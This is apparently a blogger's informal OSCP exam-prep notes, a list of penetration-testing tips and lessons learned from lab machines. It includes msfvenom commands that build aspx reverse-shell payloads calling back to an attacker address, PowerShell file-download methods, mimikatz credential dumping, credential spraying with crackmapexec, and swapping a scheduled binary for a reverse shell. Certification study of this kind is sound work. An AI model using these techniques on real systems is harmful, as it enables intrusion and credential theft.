..

OSCP notes

A collection of unsorted bite-sized notes, “today I learned” style

  1. Get familiar with ftp and smtp commands and how to use them over nc or telnet. Its very useful and you will need it.
    1. nc by default sends a LF character when you press enter, but some services expect CRLF. If you’re not getting output, start nc with the -C flag (see man nc).
  2. aspx shells generated with msfvenom depend on architecture. There’s a version for x86 and one for x64:
    1. msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=192.168.45.XX LPORT=443 -o shell-x86.aspx
      1. `msfvenom -f aspx -p windows/x64/shell_reverse_tcp LHOST=192.168.45.XX LPORT=443 -o shell-x64.aspx
  3. Get familiar with file formats associated with different web technologies. Very useful for file upload bypasses
    1. https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/web-application/file-upload-bypass
    2. https://github.com/fuzzdb-project/fuzzdb/tree/master/attack/file-upload
  4. Know as many different ways of transfering files as you can:
    1. start impacket-smbserver on your kali and copy from/to a victim machine
    2. transfer with nc, scp, certutil, evil-winrm
    3. powershell has several methods for downloading/uploading files. This one seems quite reliable and available since powershell v2.0: iwr, (New-Object Net.WebClient).DownloadFile($url, $fullpath) 1
    4. know ftp, both how to start server on kali, as well as how to upload download from command line
    5. VBScript for older hosts XP/2003 1
    6. python -m http.server 80 or another option, updog
  5. you know of SecLists, but did look through the repo? many kinds of lists are in there. ^[https://github.com/danielmiessler/SecLists], specially default passwords
  6. This might sound dumb, but you’d be surprised. If you have unhealthy habits (sugar, coffee, sleeping patterns, nicotine) moderate them a bit 5-7 days leading to exam day. You’ll need the stamina and concentration.
  7. List msfconsole payloads with: msfconsole -l payloads
    1. Catch msfvenom stageless payloads with nc. Catch msfvenom staged payloads with msfconsole
  8. During exam always have some recon scan going, but start with simpler initial scans, eg: -sC -sV
  9. pyenv is very useful, it allows you to have multiple python versions and environments. There are many exploits that require python2, or tools that have specific requirements that need to be satisfied.
  10. Make regular (weekly) snapshots of your VMs. But I know you’ll forget anyways, regret it later, and then write it on your own “lessons learned” for the next person to forget it too.
    1. Ok you did backups, but are you prepared for your hard-drive to die a week before exam? It happened to me… lost installed tools and few customizations on my kali etc. Fortunately my notes were on google drive. (I was also able to recover the VM before exam so all is good)
  11. rabit-holes I fell into:
    1. Getting weird powershell errors because I was using a shell from one repo .ps1 and an enumeration .ps1 from another repo. There are different versions of Invoke-Mimikatz our there, and they are not necessarily compatible. If you’re using a nishang reverse shell and want to do Invoke-Mimikatz, you should use the module from nishang repo
    2. On linux usernames can be case sensitive
    3. failing to enumerate user folders properly (didnt see the hidden file that was intended path)
    4. getting stuck with wrong version of mimikatz that was not working on my target system
    5. not enumerating snmp properly: snmpwalk -v2c -c public {RHOST} nsExtendObjects
    6. not seeing the output of a binary that was the intended path, because it didnt show in evil-winrm (but would show over other shells like impacket psexec or ConPtyShell). When possible make an msvenom payload and get a better shell
    7. you can upload and download with evil-winrm, the command expects full paths
    8. forgetting to do “token::elevate” and failing to get lsadump contents on mimikats when all other commands would work
    9. not finding an exploit because it wasnt on exploit-db.. always google and search github for exploits too
    10. forgetting to try default credentials, always google for them, try admin:admin, username:username etc
    11. if you find new credentials try them on every service you know. You find new service try every credential you have.
      1. also remember to spray all combinations to test for credential re-use
      2. when spraying with cme, also remember to do domain (-d lab.local) and local (--local-auth)
    12. If you escalate, re-enumerate: forgot to look at powershell history after escalation
    13. this one is dumb af.. failed to enumerate properly because mistyped or forgot port number on my ffuf command. This happened a few times
    14. In web enumeration, failed to enumerate with extentions and didn’t find a .pdf that was the intended path. When there are only a few ports open, or all other options exhausted
    15. Had LFI and didnt look for default ssh key files (there are more possible files than id_rsa)
    16. there’s some weirdness with crackmapexec rdp where sometimes it doesn’t report a correct credential. also try impacket-rdp_check
    17. had domain creds and forgot to enumerate share contents. do --shares with crackmapexec or try smbclient/smbmap
    18. used wrong hashcat mode :’( check https://hashcat.net/wiki/doku.php?id=example_hashes
    19. Saw a suspicious binary on a windows target tried to run it and moved on; it was actually running on a schedule and I didn’t think to try and replace it with a reverse shell.
    20. After getting a foothold, didn’t realize there was a port that wasn’t accessible from outside
    21. Didn’t try an exploit because the version on the description was newer than my

  1. https://hackersinterview.com/oscp/oscp-cheatsheet-windows-file-transfer-techniques/ ↩︎ ↩︎